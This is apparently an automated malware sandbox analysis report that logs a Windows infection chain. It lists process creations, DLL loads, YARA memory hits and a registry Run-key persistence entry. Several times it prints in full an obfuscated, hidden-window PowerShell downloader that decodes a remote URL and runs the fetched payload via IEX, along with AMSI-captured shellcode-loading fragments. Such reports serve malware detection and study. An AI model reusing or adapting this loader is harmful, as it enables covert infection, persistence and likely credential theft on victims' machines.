                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*/1L source: msiexec.exe, 00000013.00000002.2741454011.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*h# source: msiexec.exe, 00000013.00000002.2741454011.0000000002B17000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbDp source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb( source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2436956991.00000000078C4000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 00000005.00000002.2444276578.000000000941D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2444032858.0000000008C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2430167631.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Kommodernes)$GloBAl:AgErjOrDeN = [SYsteM.tEXt.ENcodiNg]::AsCiI.GETStRINg($kusKEsLAG)$gLoBaL:teuToNizE=$aGeRJOrdeN.suBstRING($ALlerGists,$tUGTELSEN16)<#Fourteener Forjudges Alabamians
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Bewitchment162 $Senaterne $Velocious), (Hurdis @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preadmitting190 = [AppDomain]::CurrentDomain.GetAssemblies()
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bongoes)), $Crossopterygiivredes).DefineDynamicModule($Floragraferede, $false).DefineType($Fjerposes, $dormy, [System.MulticastDelegat
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Kommodernes)$GloBAl:AgErjOrDeN = [SYsteM.tEXt.ENcodiNg]::AsCiI.GETStRINg($kusKEsLAG)$gLoBaL:teuToNizE=$aGeRJOrdeN.suBstRING($ALlerGists,$tUGTELSEN16)<#Fourteener Forjudges Alabamians
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Da
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kak
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (DaJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,18_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A52D3 pushad ; iretd 2_2_00007FFD347A5329
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04C642BD push ebx; ret 5_2_04C642DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04C6CCB8 pushfd ; ret 5_2_04C6CCB9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04C61C01 pushad ; iretd 5_2_04C61C51
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07ADCE17 pushfd ; iretd 5_2_07ADCE2D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07ADEDDE push ds; ret 5_2_07ADEDDF
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044693D push ecx; ret 18_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044DB70 push eax; ret 18_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044DB70 push eax; ret 18_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00451D54 push eax; ret 18_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00451D34 push eax; ret 19_2_00451D41
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00444E71 push ecx; ret 19_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414060 push eax; ret 20_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414060 push eax; ret 20_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414039 push ecx; ret 20_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udstiller35Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udstiller35Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004047CB
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
